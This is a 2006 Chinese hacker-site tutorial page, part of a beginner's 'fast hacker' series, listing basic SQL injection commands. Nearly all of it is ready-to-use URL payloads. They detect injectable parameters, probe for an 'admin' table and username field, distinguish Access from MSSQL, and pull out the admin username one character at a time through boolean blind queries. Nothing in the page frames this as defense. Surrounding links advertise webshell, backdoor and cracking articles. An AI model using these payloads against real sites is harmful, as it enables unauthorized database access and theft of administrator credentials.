黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图
您现在的位置: 黑客风云 >> 黑客文章 >> 黑客入门 >> 电脑新手 >> 文章正文
[推荐]菜鸟级黑客速成办法(二十三)
      ★★★★★
菜鸟级黑客速成办法(二十三)
文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2006-11-27

SQL注射基础命令

==================================================
□ 检测可否注入
==================================================
http://url/xx?id=1111 and 1=1 (正常页面)
http://url/xx?id=1111 and 1=2 (出错页面)

==================================================
□ 检测表段的
==================================================
http://url/xx?id=1111 and exists (select * from admin)

==================================================
□ 检测字段的
==================================================
http://url/xx?id=1111 and exists (select username from admin)

==================================================
□ 检测ID
==================================================
http://url/xx?id=1111 and exists (select id from admin where ID=1)

==================================================
□ 检测长度的
==================================================
http://url/xx?id=1111 and exists (select id from admin where len(username)=5 and ID=1)

==================================================
□ 检测长度的
==================================================
http://url/xx?id=1111 and exists (select id from admin where len(username)=5 and ID=1)

==================================================
□ 检测是否为MSSQL数据库
==================================================
http://url/xx?id=1111 and exists (select * from sysobjects)

==================================================
□ 检测是否为英文
==================================================
(ACCESS数据库)
http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)

(MSSQL数据库)
http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and
ID=1)

==================================================
□ 检测英文的范围
==================================================
(ACCESS数据库)
http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)

(MSSQL数据库)
http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)

==================================================
□ 检测那个字符
==================================================
(ACCESS数据库)
http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)

(MSSQL数据库)
http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1)

[1] [2] 下一页  

文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章:
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    抽根憋闷烟的心声
    学习网页制作的理由
    加入终身会员的理由!!!
    学习黑客编程的5大理由
    学习免杀的6大理由
    学习软件破解的理由
    会员账号开通查询
    常见问题解答
    汇款向导
    学员报名咨询
    最 新 热 门
    Vista+谷歌拼音输入法重现输入法04-06
    45种可以拿到Webshell的技巧04-02
    0起步接触黑客--实用价值相当高04-02
    普通文件的欺骗手法03-21
    黑客技术-ARP欺骗03-19
    跨站Script攻击和防范03-19
    超级兔子+WinRAR轻松破解收费加密03-16
    浏览器执行exe文件的探讨03-15
    菜鸟"搜"大量Web Shell的思路03-14
    轻松录制在线网络电视的方法03-14
    突破单位网管封杀QQ、MSN 端口的03-14
    菜鸟找漏洞—渗透网站的“反思”02-06
    相 关 文 章
  • 与黑客过招 给自己的网络设道安全防线

  • 菜鸟选购电源防忽悠秘笈

  • 黑客如何穿透ADSL路由入侵内网

  • 黑客初级技术概述

  • 0起步接触黑客--实用价值相当高

  • 菜鸟啄硬壳—玩转PE文件头

  • 黑客破解Email账号常用的三种方法

  • 黑客技术-ARP欺骗

  • Windows XP开机就打开小键盘解决办法

  • 菜鸟"搜"大量Web Shell的思路

  • 挑战黑客入侵 安全虚拟主机配置

  • 黑客常见的一些留后门手法

    • Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886